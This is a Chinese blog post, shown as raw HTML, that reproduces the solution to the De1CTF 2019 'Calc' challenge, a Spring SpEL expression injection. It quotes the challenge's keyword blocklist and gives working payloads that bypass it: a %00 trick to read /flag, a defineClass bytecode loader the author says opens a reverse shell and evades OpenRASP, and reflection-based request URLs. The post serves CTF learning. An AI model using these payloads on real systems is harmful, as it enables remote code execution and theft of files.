<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/favicon.ico?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,java," />





  <link rel="alternate" href="/atom.xml" title="Da13's blog" type="application/atom+xml" />






<meta name="description" content="De1ctf2019-Calc复现spel表达式注入，1.3.1以下存在的spring漏洞。 但是有过滤操作，拦截了包含不限于以下的关键字 1ProcessBuilder, getClass, java.lang, Runtime, &#39;#&#39;,T(,start  解法一：因为我们只是读取文件，我们可以用nio文件系统来读取，如果没有任何过滤我们可以构造以下payload去读取。 1j">
<meta property="og:type" content="article">
<meta property="og:title" content="De1ctf2019-Calc复现">
<meta property="og:url" content="http://yoursite.com/2020/05/07/De1tactf2019-Calc/index.html">
<meta property="og:site_name" content="Da13&#39;s blog">
<meta property="og:description" content="De1ctf2019-Calc复现spel表达式注入，1.3.1以下存在的spring漏洞。 但是有过滤操作，拦截了包含不限于以下的关键字 1ProcessBuilder, getClass, java.lang, Runtime, &#39;#&#39;,T(,start  解法一：因为我们只是读取文件，我们可以用nio文件系统来读取，如果没有任何过滤我们可以构造以下payload去读取。 1j">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/007S8ZIlgy1gek21z5au2j31rw0eiwij.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/007S8ZIlgy1gek21cgcysj31660fwdiu.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/007S8ZIlgy1gek21pxy4rj31sq0h0gr3.jpg">
<meta property="article:published_time" content="2020-05-07T10:26:07.917Z">
<meta property="article:modified_time" content="2020-05-07T10:26:07.918Z">
<meta property="article:author" content="Da13">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="java">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://tva1.sinaimg.cn/large/007S8ZIlgy1gek21z5au2j31rw0eiwij.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/05/07/De1tactf2019-Calc/"/>





  <title>De1ctf2019-Calc复现 | Da13's blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Da13's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/05/07/De1tactf2019-Calc/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Da13">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/123.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Da13's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">De1ctf2019-Calc复现</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-05-07T18:26:07+08:00">
                2020-05-07
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/" itemprop="url" rel="index">
                    <span itemprop="name">ctf</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="De1ctf2019-Calc复现"><a href="#De1ctf2019-Calc复现" class="headerlink" title="De1ctf2019-Calc复现"></a>De1ctf2019-Calc复现</h1><p>spel表达式注入，1.3.1以下存在的spring漏洞。</p>
<p>但是有过滤操作，拦截了包含不限于以下的关键字</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ProcessBuilder, getClass, java.lang, Runtime, &#39;#&#39;,T(,start</span><br></pre></td></tr></table></figure>

<h2 id="解法一："><a href="#解法一：" class="headerlink" title="解法一："></a>解法一：</h2><p>因为我们只是读取文件，我们可以用nio文件系统来读取，如果没有任何过滤我们可以构造以下payload去读取。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java.nio.file.Files.readAllLines(java.nio.file.Paths.get(&#39;&#x2F;flag&#39;),java.nio.charset.Charset.defaultCharset())</span><br></pre></td></tr></table></figure>
<p>然后转换成spel格式就是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">T(java.nio.file.Files).readAllLines(T(java.nio.file.Paths).get(&#39;&#x2F;flag&#39;),T(java.nio.charset.Charset).defaultCharset())</span><br></pre></td></tr></table></figure>

<p>但是这里对T(过滤了怎么办呢？</p>
<p>在spel解析源码spring-expression-5.2.5.RELEASE.jar!/org/springframework/expression/spel/standard/Tokenizer.class中规定了对00截断字符进行空白符号处理，也就是说我们可以通过%00来绕过。</p>
<p>（具体详见：<a href="https://landgrey.me/blog/15/?nsukey=XVe5A7dinIppwf2JitPxpna5tjYGXbzhZhI7CoIwOZiWXbCXOTC0pkyTrQW%2BTQdnF%2BZfHkcGU76mAebccU0AhQ6jy%2B%2BHJN1OgZX5b%2BhTYE46oeJp2rLtiBlWZeL8mlM4xESP0WSUGhAybv7au4PldgUTPqdEiguFHPpwwGO2dWfyHblxiMLkRbmmLtsl1X%2BMTWBUVD4cx0pm3JrwcGqCDA%3D%3D）" target="_blank" rel="noopener">https://landgrey.me/blog/15/?nsukey=XVe5A7dinIppwf2JitPxpna5tjYGXbzhZhI7CoIwOZiWXbCXOTC0pkyTrQW%2BTQdnF%2BZfHkcGU76mAebccU0AhQ6jy%2B%2BHJN1OgZX5b%2BhTYE46oeJp2rLtiBlWZeL8mlM4xESP0WSUGhAybv7au4PldgUTPqdEiguFHPpwwGO2dWfyHblxiMLkRbmmLtsl1X%2BMTWBUVD4cx0pm3JrwcGqCDA%3D%3D）</a></p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">T%00(java.nio.file.Files).readAllLines(T%00(java.nio.file.Paths).get(&#39;&#x2F;flag&#39;),T%00(java.nio.charset.Charset).defaultCharset())</span><br></pre></td></tr></table></figure>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlgy1gek21z5au2j31rw0eiwij.jpg" alt=""></p>
<p>如果我们想弹shell怎么办呢？</p>
<p>这里我们可以利用类加载的机制。</p>
<p>spring中有个org.springframework.cglib.core.ReflectUtils类中有个defineClass的静态方法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">public static Class defineClass(String className, byte[] b, ClassLoader loader) throws Exception &#123;return defineClass(className, b, loader, PROTECTION_DOMAIN);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>既然这里有定义类的，我们只要再去找到类加载的地方就行了。org.springframework.util.ClassUtils.getDefaultClassLoader()</p>
<p>类加载细节可以参考这里 <a href="https://javasec.org/javase/ClassLoader/" target="_blank" rel="noopener">https://javasec.org/javase/ClassLoader/</a></p>
<p>构造payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">T%00(org.springframework.cglib.core.ReflectUtils).defineClass(&#39;Singleton&#39;,T%00(com.sun.org.apache.xml.internal.security.utils.Base64).decode(&#39;构造的字节码的base64加密&#39;),T%00(org.springframework.util.ClassUtils).getDefaultClassLoader())</span><br></pre></td></tr></table></figure>

<p>即可反弹shell，这里利用类加载绕过 openrasp 成功执行了自定义代码。</p>
<h2 id="解法二-官方解法-："><a href="#解法二-官方解法-：" class="headerlink" title="解法二(官方解法)："></a>解法二(官方解法)：</h2><p>既然getclass被过滤了，咋们得想办法重新构造一个能取代getclass的方法。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;106.52.164.141&#x2F;spel&#x2F;calc?calc&#x3D;%27%27.class.getSuperclass().class</span><br></pre></td></tr></table></figure>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlgy1gek21cgcysj31660fwdiu.jpg" alt=""></p>
<p>这样就可以绕过getcalss的判断，Runtime可以用字符串拼接的方式绕过。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;106.52.164.141&#x2F;spel&#x2F;calc?calc&#x3D;%27%27.class.getSuperclass().class.forName(%27java.la%27+%27ng.Run%27+%27time%27)</span><br></pre></td></tr></table></figure>
<p>这里用到的forName是想利用java的反射来构造类.方法。具体可参考<a href="https://javasec.org/javase/Reflection/Reflection.html反射利用机制" target="_blank" rel="noopener">https://javasec.org/javase/Reflection/Reflection.html反射利用机制</a></p>
<p>这里构造一个本身的payload：<br>java.nio.file.Files.readAllLines(java.nio.file.Paths.get(java.net.URI.create(java.lang.String(‘file://flag’)))))</p>
<p>这里将这串payload进行“改装”成反射的加载形式：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.class.forName(&quot;java.nio.file.Files&quot;).getMethod(&quot;readAllLines&quot;, 1.class.forName(&quot;java.nio.file.Path&quot;)).invoke(null, 1.class.forName(&quot;java.nio.file.Paths&quot;).getMethod(&quot;get&quot;, 1.class.forName(&quot;java.net.URI&quot;)).invoke(null, 1.class.forName(&quot;java.net.URI&quot;).getMethod(&quot;create&quot;, 1.class.forName(&quot;java.la&quot;+&quot;ng.Str&quot;+&quot;ing&quot;)).invoke(null, &quot;file:&#x2F;&#x2F;&#x2F;flag&quot;)))</span><br></pre></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlgy1gek21pxy4rj31sq0h0gr3.jpg" alt=""></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>最近才开始接触java，不得不说java是一个很有魅力的语言。特利用此题对之前学习的java内容进行巩固和训练。</p>
<p>就此题而言，个人更推荐解法一，是因为解法一更巧妙并且可以加强对java代码以及类加载的理解。</p>
<h2 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h2><p>感谢De1ta的付出，比赛体验还是很不错的，题目质量也是很好，学到了很多！</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
            <a href="/tags/java/" rel="tag"># java</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/04/11/mysql%E7%AC%94%E8%AE%B0%E6%95%B4%E7%90%86/" rel="next" title="mysql渗透测试笔记小结">
                <i class="fa fa-chevron-left"></i> mysql渗透测试笔记小结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/06/04/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86tips/" rel="prev" title="Intranet-Information-Gathering-tips">
                Intranet-Information-Gathering-tips <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/123.jpg"
                alt="Da13" />
            
              <p class="site-author-name" itemprop="name">Da13</p>
              <p class="site-description motion-element" itemprop="description">低调做人，高调做事</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7C%20archive">
              
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">分类</span>
                
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.virtua1.cn" title="Virtua1" target="_blank">Virtua1</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://yml-sec.top" title="夜莫离" target="_blank">夜莫离</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://nightrainy.github.io/" title="知世" target="_blank">知世</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://reb0rn.design" title="张灵灵" target="_blank">张灵灵</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.ydspoplar.top/" title="杨大树" target="_blank">杨大树</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#De1ctf2019-Calc复现"><span class="nav-number">1.</span> <span class="nav-text">De1ctf2019-Calc复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#解法一："><span class="nav-number">1.1.</span> <span class="nav-text">解法一：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解法二-官方解法-："><span class="nav-number">1.2.</span> <span class="nav-text">解法二(官方解法)：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">1.3.</span> <span class="nav-text">总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#最后"><span class="nav-number">1.4.</span> <span class="nav-text">最后</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Da13</span>

  
</div>


 



  <span class="post-meta-divider"></span>







<div class="powered-by">
<i class="fa fa-user-md"></i>
<span id="busuanzi_container_site_uv">
  本站总访客数:<span id="busuanzi_value_site_uv"></span>&nbsp;&nbsp;| 
</span>
<span id="busuanzi_container_site_pv">
    &nbsp;本站总访问量<span id="busuanzi_value_site_pv"></span>次
</span>
</div>
</div>

        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
